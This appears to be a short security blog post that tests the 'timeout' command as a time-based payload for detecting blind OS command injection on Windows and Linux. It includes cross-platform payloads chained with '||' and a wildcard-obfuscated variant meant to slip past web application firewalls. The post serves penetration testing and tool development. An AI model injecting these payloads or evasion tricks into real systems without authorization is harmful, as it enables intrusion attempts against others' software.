I've recently learned about the "Timeout" function while working with cmd.exe and wanted to share this quick post with you.
I discovered that the Timeout function can delay any system function for X seconds with the "/T X" command when I looked at the Timeout help pages via the "Timeout /?" command in Windows OS. For Linux, it does something similar with "Timeout Xs".
We could delay the system via the Timeout function. Then, I got an idea! Maybe I could create an alternative to attack vectors such as Ping or Sleep in this way. It seems like we can do this in very different ways. When we run the command, we might get some syntax errors, but I assume that some of the code will work. Now let's try to use this information to develop attack vectors.
Timeout /T 1
waiting for 1 sec
Timeout 1
waiting for 1 sec
timeout 1
I got the error “Try 'timeout --help' for more information.”
timeout 1s sleep 5
waiting for 1 sec. The “Sleep” command is not working.
timeout 1 sleep 5
waiting for 1 sec. The “Sleep” command is not working.
timeout 3 ping -n 127.0.0.1
The ping command worked 3 times.
timeout 0 ping -n 3 127.0.0.1
I got the error.“connect : Invalid argument”
For both Linux and Windows, we have created some payloads above. Now let's try to create an attack vector that will work in both operating systems. To accomplish this, we divide the command into two using the "||" double pipe property.
timeout 5 || timeout 1 sleep 5
The command worked on the left of the double pipe
timeout /T 5 || timeout 1 sleep 5
The command worked on the left of the double pipe
timeout 5 || timeout 1 sleep 5
The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waited for 1 second on the right.
timeout 5 || timeout 0 sleep 5
The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waited for 5 seconds on the right using the sleep command
As we have seen in this section, we have developed a few examples that worked in both operating systems, and then I created an issue in the Commix repository for these attack vectors (Commix - Github Issues). Maybe, the Timeout function can be used for WAF bypass detection in the OOB (Out Of Band) payload, which is time-based detection in the vulnerability detection phase.
We could create other variants via this code below for WAF Bypass while testing OS Command Injection. Also, the “?” symbol triggers the bash guess mechanism.
timeout 3 /b??/p??g -n 127.0.0.1
Have fun!
Special thanks to Zinnur Yeşilyurt